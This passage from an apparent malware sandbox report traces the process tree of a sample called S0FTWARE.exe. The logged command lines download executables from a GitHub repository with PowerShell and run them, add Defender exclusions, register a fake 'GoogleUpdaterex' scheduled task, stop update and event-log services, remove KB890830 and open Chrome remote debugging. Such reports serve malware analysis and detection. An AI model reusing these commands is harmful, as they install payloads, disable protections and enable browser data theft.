                                                                                                                                                            1⤵
                                                                                                                                                              PID:4404
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe'"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5208
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe'"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2796
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe'"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:864
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe'"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:3028
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\ynaqrpirpdi\buzqgxyhpt.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5280
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:756
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:2052
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\ynaqrpirpdi\arfbdsv.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4236
                                                                                                                                                                      • C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                        C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3352
                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:3536
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3736
                                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4208
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:3012
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4628
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:1996
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:5828
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:2148
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:1840
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:5228
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:5892
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                PID:5940
                                                                                                                                                                            • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                                              "C:\Users\Admin\Desktop\S0FTWARE.exe"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3528
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\auroiq', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3004
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\auroiq', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:4044
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe'"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2688
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe'"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:5500
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe'"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1916
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe'"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:1996
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\auroiq\ozksszmwrb.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5968
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                                                            PID:2304
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1452
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1952,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5888
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2064,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:2
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5964
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:8
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3172 /prefetch:1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                      PID:5776
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3144 /prefetch:1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                                                      PID:6116
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4688,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=5016 /prefetch:8
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2336
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,649684832178329233,17508646855424916343,262144 --variations-seed-version --mojo-platform-channel-handle=5100 /prefetch:8
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1008
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe'"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:432
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe'"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:5576
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\auroiq\jnsgwqqfvitr.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2316
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1092
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:3248
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\auroiq\rilrzm.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3972
                                                                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                PID:3004
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:380
                                                                                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5364
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:3836
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:5380
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:5532
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:2560
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                    PID:3740
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                    PID:5316
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                    PID:2960
                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:5680
                                                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:5984
                                                                                                                                                                                                              • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                "C:\Users\Admin\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1284
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pcfghvredizu', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3484
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pcfghvredizu', 'C:\Users', 'C:\ProgramData'"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                        PID:4700
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe'"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4712
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe'"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                          PID:5620
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe'"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1996
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\svrwkzmghj.exe'"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:1916
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\pcfghvredizu\vdiqkdxkbcyl.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:440
                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Uses browser remote debugging
                                                                                                                                                                                                                              PID:6064
                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff85ad5dcf8,0x7ff85ad5dd04,0x7ff85ad5dd10
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1960,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2100 /prefetch:3
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:5160
                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:628
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                                                                        PID:1244
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=3292 /prefetch:1
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                                                                        PID:3776
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=4504 /prefetch:1
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                                                                                        PID:824
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5212,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:8
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:5740
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5332,i,9828277087211779880,11728275887613577407,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:8
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5164
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\pcfghvredizu\cjjuztwbgkj.exe'"
